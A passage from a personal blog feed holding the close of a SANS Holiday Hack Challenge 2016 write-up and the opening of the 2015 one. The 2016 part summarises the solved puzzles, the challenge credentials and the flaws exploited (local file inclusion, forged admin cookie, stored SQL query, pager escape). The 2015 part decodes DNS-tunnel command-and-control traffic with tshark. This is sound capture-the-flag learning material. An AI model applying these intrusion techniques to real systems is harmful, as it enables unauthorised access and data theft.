&lt;li&gt;&lt;a class="reference external" href="/docs/sans-christmas-challenge-2016/discombobulatedaudio1.mp3"&gt;discombobulatedaudio1.mp3&lt;/a&gt; (sha256: &lt;code&gt;8e759e28702e15720ff357694b1f8c9062680da933df5c9bdd16897bfcd00f01&lt;/code&gt;)&lt;/li&gt;
&lt;li&gt;&lt;a class="reference external" href="/docs/sans-christmas-challenge-2016/discombobulatedaudio2.mp3"&gt;discombobulatedaudio2.mp3&lt;/a&gt; (sha256: &lt;code&gt;e0050656c5262116f82cbe82c85d0b91f9003f22568bee7f4ce7987744c34f99&lt;/code&gt;)&lt;/li&gt;
&lt;li&gt;&lt;a class="reference external" href="/docs/sans-christmas-challenge-2016/discombobulatedaudio3.mp3"&gt;discombobulatedaudio3.mp3&lt;/a&gt; (sha256: &lt;code&gt;7c4a50771764b97227d27aa9dd0a99f396982882111a4924c0b51ee625251ac7&lt;/code&gt;)&lt;/li&gt;
&lt;li&gt;&lt;a class="reference external" href="/docs/sans-christmas-challenge-2016/debug-20161224235959-0.mp3"&gt;debug-20161224235959-0.mp3&lt;/a&gt; (sha256: &lt;code&gt;35f5578bc12f096f4072e1dde2688b15145ba59bc48e9cb405576247c7e5a8bb&lt;/code&gt;)&lt;/li&gt;
&lt;li&gt;&lt;a class="reference external" href="/docs/sans-christmas-challenge-2016/discombobulatedaudio5.mp3"&gt;discombobulatedaudio5.mp3&lt;/a&gt; (sha256: &lt;code&gt;c088b01e3accc21eda910f25755ebe2ccda3959e4810ce76cdd8cde8ff07651e&lt;/code&gt;)&lt;/li&gt;
&lt;li&gt;&lt;a class="reference external" href="/docs/sans-christmas-challenge-2016/discombobulated-audio-6-XyzE3N9YqKNH.mp3"&gt;discombobulated-audio-6-XyzE3N9YqKNH.mp3&lt;/a&gt; (sha256: &lt;code&gt;776b26a58310d9ad80ab7b5c80fe4a5e03ed86210d9e28906fb93e30004ef35a&lt;/code&gt;)&lt;/li&gt;
&lt;li&gt;&lt;a class="reference external" href="/docs/sans-christmas-challenge-2016/discombobulatedaudio7.mp3"&gt;discombobulatedaudio7.mp3&lt;/a&gt; (sha256: &lt;code&gt;60259f117d76535518dc2b3f01ae314f0969d61ae7066e75af708be7b059f214&lt;/code&gt;)&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;At first, I suspected that, since all the files are approximately the same
length, you had to superimpose every one of them, or something, which led
to this horrendous result:&lt;/p&gt;
&lt;audio src="/docs/sans-christmas-challenge-2016/horrendous_audio_file.ogg" controls&gt;&lt;/audio&gt;&lt;p&gt;You can download the audio file &lt;a class="reference external" href="/docs/sans-christmas-challenge-2016/horrendous_audio_file.ogg"&gt;here&lt;/a&gt; (sha256: &lt;code&gt;c195d43e6445c84686a1bd4e89429db0f2802e8d8ae31e93769490d1204e098c&lt;/code&gt;)&lt;/p&gt;
&lt;p&gt;The solution is actually quite simpler. You just have to put the audio files
in the order we found them, then change the tempo of the audio track, to get
something intelligible:&lt;/p&gt;
&lt;audio src="/docs/sans-christmas-challenge-2016/de_discombobulated_audio.ogg" controls&gt;&lt;/audio&gt;&lt;p&gt;You can download the audio file &lt;a class="reference external" href="/docs/sans-christmas-challenge-2016/de_discombobulated_audio.ogg"&gt;here&lt;/a&gt; (sha256: &lt;code&gt;20e91d466c4cea4e1282e32dfc52725eadff05276d91bcc9fbd547c09bf2964a&lt;/code&gt;)&lt;/p&gt;
&lt;p&gt;If you can't quite hear the spoken phrase, it's:&lt;/p&gt;
&lt;blockquote&gt;
Father Christmas, Santa Claus or, as I've always known him, Jeff.&lt;/blockquote&gt;
&lt;p&gt;Now, I didn't recognize the reference right away, but if you
&lt;a class="reference external" href="https://duckduckgo.com/?q=%22Father+Christmas%2C+Santa+Claus+or%2C+as+I%27ve+always+known+him%2C+Jeff.%22&amp;amp;ia=web"&gt;DuckDuckgo the sentence&lt;/a&gt;
(or part of it if you only got some audio files), you find that it's from a
Doctor Who Christmas Special, &lt;a class="reference external" href="http://www.imdb.com/title/tt1672218/"&gt;A Christmas Carol&lt;/a&gt;.
Now, I DID see this Doctor Who, but failed to remember the reference, so I'm
still ashamed of this.&lt;/p&gt;
&lt;p&gt;Anyway, if you remember, there was still one door in the North Pole we couldn't
open: the door in the Corridor. Since the audio pointed to Doctor Who, I tried
every element of the show I could think of (&amp;quot;The Doctor&amp;quot;, &amp;quot;Amy Pond&amp;quot;, &amp;quot;The
Master&amp;quot;, &amp;quot;Tardis&amp;quot;, &amp;quot;tardis&amp;quot;, &amp;quot;TARDIS&amp;quot;, &amp;quot;Geronimo&amp;quot;, &amp;quot;Geronimo!&amp;quot;, &amp;quot;Geronimo!!!&amp;quot;,
...). Turns out, the passphrase to the door was just the full sentence we
hear in the audio file. Trying too hard leads nowhere.&lt;/p&gt;
&lt;p&gt;Now that we've opened the door, we can see Who is behind this nefarious plot
(see what I did there?).&lt;/p&gt;
&lt;img alt="the_doctor.png" class="align-center" src="/images/sans-christmas-challenge-2016/the_doctor.png" /&gt;
&lt;p&gt;It was the Doctor all along! If we talk to him, he explains his plan:&lt;/p&gt;
&lt;blockquote&gt;
The question of the hour is this: Who nabbed Santa. The answer? Yes,
I did. Next question: Why would anyone in his right mind kidnap Santa
Claus? The answer: Do I look like I'm in my right mind? I'm a madman
with a box. I have looked into the time vortex and I have seen a
universe in which the Star Wars Holiday Special was NEVER released.
In that universe, 1978 came and went as normal. No one had to endure
the misery of watching that abominable blight. People were happy
there. It's a better life, I tell you, a better world than the
scarred one we endure here. Give me a world like that. Just once. So
I did what I had to do. I knew that Santa's powerful North Pole
Wonderland Magick could prevent the Star Wars Special from being
released, if I could leverage that magick with my own abilities back
in 1978. But Jeff refused to come with me, insisting on the mad idea
that it is better to maintain the integrity of the universe’s
timeline. So I had no choice – I had to kidnap him. It was sort
of one of those days. Well. You know what I mean. Anyway... Since you
interfered with my plan, we'll have to live with the Star Wars
Holiday Special in this universe... FOREVER.  If we attempt to go
back again, to cross our own timeline, we'll cause a temporal
paradox, a wound in time. We'll never be rid of it now. The Star Wars
Holiday Special will plague this world until time itself ends... All
because you foiled my brilliant plan.  Nice work.&lt;/blockquote&gt;
&lt;p&gt;Now, although I'm a major Star Wars fan, I've always decided to listen to the
advice of my elders regarding the &lt;a class="reference external" href="https://en.wikipedia.org/wiki/Star_Wars_Holiday_Special"&gt;Christmas Special&lt;/a&gt;
(shout out to &lt;a class="reference external" href="https://xkcd.com/653/"&gt;Randal Munroe&lt;/a&gt;), and I've never
watched it. Guess I'll continue to refrain from watching it. Brrrr...&lt;/p&gt;
&lt;/div&gt;
&lt;div class="section" id="epilogue-bringing-it-all-home"&gt;
&lt;h2&gt;&lt;a class="toc-backref" href="#id18"&gt;Epilogue: Bringing It All Home&lt;/a&gt;&lt;/h2&gt;
&lt;p&gt;As the title suggests, it's time to bring it home, and answer each question of
the challenge:&lt;/p&gt;
&lt;ol class="arabic simple"&gt;
&lt;li&gt;&lt;cite&gt;What is the secret message in Santa's tweets?&lt;/cite&gt;&lt;/li&gt;
&lt;/ol&gt;
&lt;p&gt;The secret message in Santa's tweets is &lt;code&gt;bugbounty&lt;/code&gt;.&lt;/p&gt;
&lt;ol class="arabic simple" start="2"&gt;
&lt;li&gt;&lt;cite&gt;What is inside the ZIP file distributed by Santa's team?&lt;/cite&gt;&lt;/li&gt;
&lt;/ol&gt;
&lt;p&gt;Inside the ZIP file distributed by Santa's team, there is a copy of the Android
application for their bug bounty, SantaGram_4.2.apk.&lt;/p&gt;
&lt;ol class="arabic simple" start="3"&gt;
&lt;li&gt;&lt;cite&gt;What username and password are embedded in the APK file?&lt;/cite&gt;&lt;/li&gt;
&lt;/ol&gt;
&lt;p&gt;The credentials in the APK file are &lt;code&gt;guest/busyreindeer78&lt;/code&gt;.&lt;/p&gt;
&lt;ol class="arabic simple" start="4"&gt;
&lt;li&gt;&lt;cite&gt;What is the name of the audible component (audio file. in the SantaGram APK
file?&lt;/cite&gt;&lt;/li&gt;
&lt;/ol&gt;
&lt;p&gt;The name of the audio file in the SantaGram APK file is
&lt;code&gt;discombobulatedaudio1.mp3&lt;/code&gt;.&lt;/p&gt;
&lt;ol class="arabic simple" start="5"&gt;
&lt;li&gt;&lt;cite&gt;What is the password for the &amp;quot;cranpi&amp;quot; account on the Cranberry Pi system?&lt;/cite&gt;&lt;/li&gt;
&lt;/ol&gt;
&lt;p&gt;The password of the &amp;quot;cranpi&amp;quot; account is &lt;code&gt;yummycookies&lt;/code&gt;.&lt;/p&gt;
&lt;ol class="arabic simple" start="6"&gt;
&lt;li&gt;&lt;cite&gt;How did you open each terminal door and where had the villain imprisoned
Santa?&lt;/cite&gt;&lt;/li&gt;
&lt;/ol&gt;
&lt;ul class="simple"&gt;
&lt;li&gt;&lt;strong&gt;Elf House #2&lt;/strong&gt;: using &lt;code&gt;sudo&lt;/code&gt; to execute commands as &lt;code&gt;itchy&lt;/code&gt;, we
can read the PCAP file, containing the two halves of the passphrase, one
encoded in plain 7-bit ASCII, one encoded in 16-bit big endian.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Workshop, first door&lt;/strong&gt;: using &lt;code&gt;find&lt;/code&gt;, we can find the file containing
the passphrase, and print its content.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Santa's office&lt;/strong&gt;: using our &lt;cite&gt;*cough cough*&lt;/cite&gt; knowledge of the film WarGames,
we can get the correct passphrase.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Workshop, second door&lt;/strong&gt;: by analyzing the &lt;code&gt;wumpus&lt;/code&gt; program, we can
find the function in charge of computing the passphrase, and directly call
it.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Train station&lt;/strong&gt;: since the &lt;code&gt;HELP&lt;/code&gt; function uses &lt;code&gt;less&lt;/code&gt; to print
the content of the help file, we can use &lt;code&gt;less&lt;/code&gt;'s features to open
other files, including the one containing the passphrase.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;The villain had imprisoned Santa Claus in the DFER room, &lt;strong&gt;in 1978&lt;/strong&gt;.&lt;/p&gt;
&lt;ol class="arabic simple" start="7"&gt;
&lt;li&gt;&lt;cite&gt;For each of those six items, which vulnerabilities did you discover and
exploit?&lt;/cite&gt;&lt;/li&gt;
&lt;/ol&gt;
&lt;ul class="simple"&gt;
&lt;li&gt;&lt;dl class="first docutils"&gt;
&lt;dt&gt;&lt;strong&gt;The Mobile Analytics Server (via credentialed login access)&lt;/strong&gt;:&lt;/dt&gt;
&lt;dd&gt;&lt;ul class="first last"&gt;
&lt;li&gt;Credentials stored in plaintext in the SantaGram APK.&lt;/li&gt;
&lt;li&gt;Use of these credentials on the analytics server.&lt;/li&gt;
&lt;/ul&gt;
&lt;/dd&gt;
&lt;/dl&gt;
&lt;/li&gt;
&lt;li&gt;&lt;dl class="first docutils"&gt;
&lt;dt&gt;&lt;strong&gt;The Dungeon Game&lt;/strong&gt;&lt;/dt&gt;
&lt;dd&gt;&lt;ul class="first last"&gt;
&lt;li&gt;Finding of the Dungeon CLI with &lt;code&gt;nmap&lt;/code&gt;.&lt;/li&gt;
&lt;li&gt;Using our &lt;cite&gt;*cough cough*&lt;/cite&gt; knowledge of the video game Zork to get the
email address of Peppermint.&lt;/li&gt;
&lt;li&gt;Sending an email to Peppermint to receive the audio file.&lt;/li&gt;
&lt;/ul&gt;
&lt;/dd&gt;
&lt;/dl&gt;
&lt;/li&gt;
&lt;li&gt;&lt;dl class="first docutils"&gt;
&lt;dt&gt;&lt;strong&gt;The Debug Server&lt;/strong&gt;:&lt;/dt&gt;
&lt;dd&gt;&lt;ul class="first last"&gt;
&lt;li&gt;Patching of the SantaGram APK to enable debug data.&lt;/li&gt;
&lt;li&gt;JSON request tampering to increase verbosity of the debug server.&lt;/li&gt;
&lt;li&gt;Disclosing of the path of the audio file in the response of the debug
server.&lt;/li&gt;
&lt;/ul&gt;
&lt;/dd&gt;
&lt;/dl&gt;
&lt;/li&gt;
&lt;li&gt;&lt;dl class="first docutils"&gt;
&lt;dt&gt;&lt;strong&gt;The Banner Ad Server&lt;/strong&gt;:&lt;/dt&gt;
&lt;dd&gt;&lt;ul class="first last"&gt;
&lt;li&gt;Using Meteor Miner, we could list the different routes.&lt;/li&gt;
&lt;li&gt;Disclosing of the &lt;code&gt;/admin/quotes&lt;/code&gt; route.&lt;/li&gt;
&lt;li&gt;Using Meteor Miner, we could list the collection of quotes.&lt;/li&gt;
&lt;li&gt;Disclosing of the path of the audio file in the attributes of one of the
quotes.&lt;/li&gt;
&lt;/ul&gt;
&lt;/dd&gt;
&lt;/dl&gt;
&lt;/li&gt;
&lt;li&gt;&lt;dl class="first docutils"&gt;
&lt;dt&gt;&lt;strong&gt;The Uncaught Exception Handler Server&lt;/strong&gt;:&lt;/dt&gt;
&lt;dd&gt;&lt;ul class="first last"&gt;
&lt;li&gt;Verbose error allowing to build a correct &lt;code&gt;ReadCrashDump&lt;/code&gt; request.&lt;/li&gt;
&lt;li&gt;Local File Inclusion in the &lt;code&gt;exception.php&lt;/code&gt; page.&lt;/li&gt;
&lt;/ul&gt;
&lt;/dd&gt;
&lt;/dl&gt;
&lt;/li&gt;
&lt;li&gt;&lt;dl class="first docutils"&gt;
&lt;dt&gt;&lt;strong&gt;The Mobile Analytics Server (post authentication)&lt;/strong&gt;:&lt;/dt&gt;
&lt;dd&gt;&lt;ul class="first last"&gt;
&lt;li&gt;Source files recovery with open Git repository.&lt;/li&gt;
&lt;li&gt;Creation of an administrator cookie.&lt;/li&gt;
&lt;li&gt;Exploitation of the &lt;code&gt;edit.php&lt;/code&gt; page to store an arbitrary SQL
query.&lt;/li&gt;
&lt;/ul&gt;
&lt;/dd&gt;
&lt;/dl&gt;
&lt;/li&gt;
&lt;/ul&gt;
&lt;ol class="arabic simple" start="8"&gt;
&lt;li&gt;&lt;cite&gt;What are the names of the audio files you discovered from each system above?&lt;/cite&gt;&lt;/li&gt;
&lt;/ol&gt;
&lt;ul class="simple"&gt;
&lt;li&gt;&lt;strong&gt;The Mobile Analytics Server (via credentialed login access)&lt;/strong&gt;: &lt;code&gt;discombobulatedaudio2.mp3&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;The Dungeon Game&lt;/strong&gt;: &lt;code&gt;discombobulatedaudio3.mp3&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;The Debug Server&lt;/strong&gt;: &lt;code&gt;debug-20161224235959-0.mp3&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;The Banner Ad Server&lt;/strong&gt;: &lt;code&gt;discombobulatedaudio5.mp3&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;The Uncaught Exception Handler Server&lt;/strong&gt;: &lt;code&gt;discombobulated-audio-6-XyzE3N9YqKNH.mp3&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;The Mobile Analytics Server (post authentication)&lt;/strong&gt;: &lt;code&gt;discombobulatedaudio7.mp3&lt;/code&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;ol class="arabic simple" start="9"&gt;
&lt;li&gt;&lt;cite&gt;Who is the villain behind the nefarious plot?&lt;/cite&gt;&lt;/li&gt;
&lt;/ol&gt;
&lt;p&gt;The villain behind the nefarious plot is the Doctor.&lt;/p&gt;
&lt;ol class="arabic simple" start="10"&gt;
&lt;li&gt;&lt;cite&gt;Why had the villain abducted Santa?&lt;/cite&gt;&lt;/li&gt;
&lt;/ol&gt;
&lt;p&gt;The Doctor had abducted Santa to use his magick to prevent the Star Wars
Christmas special from ever coming out.&lt;/p&gt;
&lt;/div&gt;
&lt;div class="section" id="conclusion"&gt;
&lt;h2&gt;&lt;a class="toc-backref" href="#id19"&gt;Conclusion&lt;/a&gt;&lt;/h2&gt;
&lt;p&gt;Once again, a great challenge by the SANS, which I managed, this time, to
finish completely! I also noticed that I didn't improve my skills in reverse
engineering and binary analysis, which is a skill I wanted to improve, as said
in last year's write-up. Bad me...&lt;/p&gt;
&lt;p&gt;Anyway, see you next year for the next SANS Christmas Challenge ;) !&lt;/p&gt;
&lt;/div&gt;
</content></entry><entry><title>SANS Christmas Challenge 2015</title><link href="https://allyourbase.utouch.fr/posts/2016/01/09/sans-christmas-challenge-2015/" rel="alternate"></link><published>2016-01-09T00:00:00+01:00</published><updated>2016-01-09T00:00:00+01:00</updated><author><name>useless</name></author><id>tag:allyourbase.utouch.fr,2016-01-09:/posts/2016/01/09/sans-christmas-challenge-2015/</id><summary type="html">&lt;img alt="sans_christmas_challenge_2015_logo.png" class="align-center" src="/images/sans-christmas-challenge-2015/sans_christmas_challenge_2015_logo.png" /&gt;
&lt;p&gt;This year again, the SANS institute delights us with a wonderful
&lt;a class="reference external" href="https://holidayhackchallenge.com/2015/"&gt;Christmas Challenge&lt;/a&gt;.&lt;/p&gt;
&lt;p&gt;We follow the &lt;a class="reference external" href="https://quest.holidayhackchallenge.com/"&gt;Dosis family&lt;/a&gt;,
after they purchase a
&lt;a class="reference external" href="https://en.wikipedia.org/wiki/The_Elf_on_the_Shelf"&gt;Gnome in Your Home&lt;/a&gt;
for their kids, Jessica and Joshua. These two kids, especially bright
for their age, tinker with the gnome, to find that it has a …&lt;/p&gt;</summary><content type="html">&lt;img alt="sans_christmas_challenge_2015_logo.png" class="align-center" src="/images/sans-christmas-challenge-2015/sans_christmas_challenge_2015_logo.png" /&gt;
&lt;p&gt;This year again, the SANS institute delights us with a wonderful
&lt;a class="reference external" href="https://holidayhackchallenge.com/2015/"&gt;Christmas Challenge&lt;/a&gt;.&lt;/p&gt;
&lt;p&gt;We follow the &lt;a class="reference external" href="https://quest.holidayhackchallenge.com/"&gt;Dosis family&lt;/a&gt;,
after they purchase a
&lt;a class="reference external" href="https://en.wikipedia.org/wiki/The_Elf_on_the_Shelf"&gt;Gnome in Your Home&lt;/a&gt;
for their kids, Jessica and Joshua. These two kids, especially bright
for their age, tinker with the gnome, to find that it has a weird,
and possible illegal behaviour.&lt;/p&gt;
&lt;p&gt;It all begins when Joshua gives us a capture file of the network
communications he recorded from the gnome...&lt;/p&gt;
&lt;div class="contents topic" id="table-of-contents"&gt;
&lt;p class="topic-title"&gt;Table of contents&lt;/p&gt;
&lt;ul class="simple"&gt;
&lt;li&gt;&lt;a class="reference internal" href="#part-1-dance-of-the-sugar-gnome-fairies-curious-wireless-packets" id="id6"&gt;Part 1: Dance of the Sugar Gnome Fairies: &lt;em&gt;Curious Wireless Packets&lt;/em&gt;&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a class="reference internal" href="#part-2-ill-be-gnome-for-christmas-firmware-analysis-for-fun-and-profit" id="id7"&gt;Part 2: I’ll be Gnome for Christmas: &lt;em&gt;Firmware Analysis for Fun and Profit&lt;/em&gt;&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a class="reference internal" href="#part-3-let-it-gnome-let-it-gnome-let-it-gnome-internet-wide-scavenger-hunt" id="id8"&gt;Part 3: Let it Gnome! Let it Gnome! Let it Gnome! &lt;em&gt;Internet-Wide Scavenger Hunt&lt;/em&gt;&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a class="reference internal" href="#part-4-theres-no-place-like-gnome-for-the-holidays-gnomage-pwnage" id="id9"&gt;Part 4: There’s No Place Like Gnome for the Holidays: &lt;em&gt;Gnomage Pwnage&lt;/em&gt;&lt;/a&gt;&lt;ul&gt;
&lt;li&gt;&lt;a class="reference internal" href="#id1" id="id10"&gt;SuperGnome01&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a class="reference internal" href="#id2" id="id11"&gt;SuperGnome02&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a class="reference internal" href="#id3" id="id12"&gt;SuperGnome03&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a class="reference internal" href="#id4" id="id13"&gt;SuperGnome04&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a class="reference internal" href="#id5" id="id14"&gt;SuperGnome05&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li&gt;&lt;a class="reference internal" href="#part-5-baby-its-gnome-outside-sinister-plot-and-attribution" id="id15"&gt;Part 5: Baby, It’s Gnome Outside: &lt;em&gt;Sinister Plot and Attribution&lt;/em&gt;&lt;/a&gt;&lt;ul&gt;
&lt;li&gt;&lt;a class="reference internal" href="#first-capture-file" id="id16"&gt;First capture file&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a class="reference internal" href="#second-capture-file" id="id17"&gt;Second capture file&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a class="reference internal" href="#third-capture-file" id="id18"&gt;Third capture file&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a class="reference internal" href="#fourth-capture-file" id="id19"&gt;Fourth capture file&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a class="reference internal" href="#fifth-capture-file" id="id20"&gt;Fifth capture file&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a class="reference internal" href="#let-s-unxor-the-images" id="id21"&gt;Let's unXOR the images&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li&gt;&lt;a class="reference internal" href="#epilogue-twas-the-gnome-before-christmas-wrapping-it-all-up" id="id22"&gt;Epilogue: ‘Twas the Gnome Before Christmas: &lt;em&gt;Wrapping It All Up&lt;/em&gt;&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a class="reference internal" href="#conclusion" id="id23"&gt;Conclusion&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;/div&gt;
&lt;div class="section" id="part-1-dance-of-the-sugar-gnome-fairies-curious-wireless-packets"&gt;
&lt;h2&gt;&lt;a class="toc-backref" href="#id6"&gt;Part 1: Dance of the Sugar Gnome Fairies: &lt;em&gt;Curious Wireless Packets&lt;/em&gt;&lt;/a&gt;&lt;/h2&gt;
&lt;p&gt;We're given a &lt;a class="reference external" href="/docs/sans-christmas-challenge-2015/giyh-capture.pcap"&gt;PCAP file&lt;/a&gt; (sha256:
&lt;code&gt;655541fb645af45db68a739066325e2f1138812a6893254ae7b48acd9519a330&lt;/code&gt;),
and are asked to analyze it, to see what we can find.  If we open it with
Wireshark, we can see a lot of DNS traffic, with what looks
like base64-encoded data in the TXT fields.&lt;/p&gt;
&lt;img alt="giyh-capture_wireshark.png" class="align-center" src="/images/sans-christmas-challenge-2015/giyh-capture_wireshark.png" /&gt;
&lt;p&gt;Using DNS requests as a communication channel with a Command and Control server
is a well known trick to bypass traffic filtering, because outbound DNS is
often authorized on a local network. So, let's extract and decode the TXT
fields. tshark is particularly adapted for this task:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;&lt;span class="gp"&gt;$&lt;/span&gt; tshark -r giyh-capture.pcap -Y dns -T fields -e dns.txt &lt;span class="p"&gt;|&lt;/span&gt; base64 -d &amp;gt; giyh-capture_decoded.txt
&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;Here, we ask tshark to focus on the DNS traffic, and to output only the TXT
fields. Now, let's take a look at the decoded file:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;&lt;span class="gp"&gt;$&lt;/span&gt; cat giyh-capture_decoded.txt
&lt;span class="go"&gt;NONE:NONE:NONE:NONE:NONE:NONE:NONE:EXEC:iwconfig&lt;/span&gt;
&lt;span class="go"&gt;EXEC:START_STATEEXEC:wlan0     IEEE 802.11abgn  ESSID:&amp;quot;DosisHome-Guest&amp;quot;&lt;/span&gt;
&lt;span class="go"&gt;EXEC:          Mode:Managed  Frequency:2.412 GHz  Cell: 7A:B3:B6:5E:A4:3F&lt;/span&gt;
&lt;span class="go"&gt;EXEC:          Tx-Power=20 dBm&lt;/span&gt;
&lt;span class="go"&gt;EXEC:          Retry short limit:7   RTS thr:off   Fragment thr:off&lt;/span&gt;
&lt;span class="go"&gt;EXEC:          Encryption key:off&lt;/span&gt;
&lt;span class="go"&gt;EXEC:          Power Management:off&lt;/span&gt;
&lt;span class="go"&gt;EXEC:&lt;/span&gt;
&lt;span class="go"&gt;EXEC:lo        no wireless extensions.&lt;/span&gt;
&lt;span class="go"&gt;EXEC:&lt;/span&gt;
&lt;span class="go"&gt;EXEC:eth0      no wireless extensions.&lt;/span&gt;
&lt;span class="go"&gt;EXEC:STOP_STATENONE:NONE:NONE:EXEC:cat /tmp/iwlistscan.txt&lt;/span&gt;
&lt;span class="go"&gt;EXEC:START_STATEEXEC:wlan0     Scan completed :&lt;/span&gt;
&lt;span class="go"&gt;EXEC:          Cell 01 - Address: 00:7F:28:35:9A:C7&lt;/span&gt;
&lt;span class="go"&gt;EXEC:                    Channel:1&lt;/span&gt;
&lt;span class="go"&gt;EXEC:                    Frequency:2.412 GHz (Channel 1)&lt;/span&gt;
&lt;span class="go"&gt;EXEC:                    Quality=29/70  Signal level=-81 dBm&lt;/span&gt;
&lt;span class="go"&gt;EXEC:                    Encryption key:on&lt;/span&gt;
&lt;span class="go"&gt;EXEC:                    ESSID:&amp;quot;CHC&amp;quot;&lt;/span&gt;
&lt;span class="go"&gt;EXEC:                    Bit Rates:1 Mb/s; 2 Mb/s; 5.5 Mb/s; 11 Mb/s; 6 Mb/s&lt;/span&gt;
&lt;span class="go"&gt;EXEC:                              9 Mb/s; 12 Mb/s; 18 Mb/s&lt;/span&gt;
&lt;span class="go"&gt;EXEC:                    Bit Rates:24 Mb/s; 36 Mb/s; 48 Mb/s; 54 Mb/s&lt;/span&gt;
&lt;span class="go"&gt;EXEC:                    Mode:Master&lt;/span&gt;
&lt;span class="go"&gt;EXEC:                    Extra:tsf=000000412e67cddf&lt;/span&gt;
&lt;span class="go"&gt;EXEC:                    Extra: Last beacon: 5408ms ago&lt;/span&gt;
&lt;span class="go"&gt;EXEC:                    IE: Unknown: 00055837335A36&lt;/span&gt;
&lt;span class="go"&gt;EXEC:                    IE: Unknown: 010882848B960C121824&lt;/span&gt;
&lt;span class="go"&gt;EXEC:                    IE: Unknown: 030101&lt;/span&gt;
&lt;span class="go"&gt;EXEC:                    IE: Unknown: 200100&lt;/span&gt;
&lt;span class="go"&gt;EXEC:                    IE: IEEE 802.11i/WPA2 Version 1&lt;/span&gt;
&lt;span class="go"&gt;EXEC:                        Group Cipher : CCMP&lt;/span&gt;
&lt;span class="go"&gt;EXEC:                        Pairwise Ciphers (1) : CCMP&lt;/span&gt;
&lt;span class="go"&gt;EXEC:                        Authentication Suites (1) : PSK&lt;/span&gt;
&lt;span class="go"&gt;EXEC:                    IE: Unknown: 2A0100&lt;/span&gt;
&lt;span class="go"&gt;EXEC:                    IE: Unknown: 32043048606C&lt;/span&gt;
&lt;span class="go"&gt;EXEC:                    IE: Unknown: DD180050F2020101040003A4000027A4000042435E0062322F00&lt;/span&gt;
&lt;span class="go"&gt;EXEC:                    IE: Unknown: 2D1A8C131BFFFF000000000000000000000000000000000000000000&lt;/span&gt;
&lt;span class="go"&gt;EXEC:                    IE: Unknown: 3D1601080800000000000000000000000000000000000000&lt;/span&gt;
&lt;span class="go"&gt;EXEC:                    IE: Unknown: DD0900037F01010000FF7F&lt;/span&gt;
&lt;span class="go"&gt;EXEC:                    IE: Unknown: DD0A00037F04010000000000&lt;/span&gt;
&lt;span class="go"&gt;EXEC:                    IE: Unknown: 0706555320010B1B&lt;/span&gt;
&lt;span class="go"&gt;[snip]&lt;/span&gt;
&lt;span class="go"&gt;EXEC:STOP_STATENONE:NONE:NONE:NONE:FILE:/root/Pictures/snapshot_CURRENT.jpg&lt;/span&gt;
&lt;span class="go"&gt;FILE:START_STATE,NAME=/root/Pictures/snapshot_CURRENT.jpgFILE:\xFF\xD8\xFF\xE0\x00\x10JFIF[raw binary]&lt;/span&gt;
&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;Ok, lots of stuff! We can see that some shell commands are executed, and there
seems to be the upload of a JPEG file. The commands and results seem to be
&lt;code&gt;EXEC:&lt;/code&gt;, and the upload of the file and the content with
&lt;code&gt;FILE:&lt;/code&gt;.&lt;/p&gt;
&lt;p&gt;We can recover the executed commands, which are &lt;code&gt;iwconfig&lt;/code&gt;, to see the
configuration of the different wirelass network interfaces of the gnome, and
&lt;code&gt;cat /tmp/iwlistscan.txt&lt;/code&gt;, which seems to give the result of the
&lt;code&gt;iwlist scan&lt;/code&gt; command, which scans available wireless networks.&lt;/p&gt;
&lt;p&gt;We can recover the content of the uploaded file, with the following commands:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;&lt;span class="gp"&gt;$&lt;/span&gt; binwalk giyh-capture_decoded.txt &lt;span class="c1"&gt;# binwalk gives us the offset at which the JPEG file starts&lt;/span&gt;

&lt;span class="go"&gt;DECIMAL       HEXADECIMAL     DESCRIPTION&lt;/span&gt;
&lt;span class="go"&gt;--------------------------------------------------------------------------------&lt;/span&gt;
&lt;span class="go"&gt;4495          0x118F          JPEG image data, JFIF standard  1.01&lt;/span&gt;
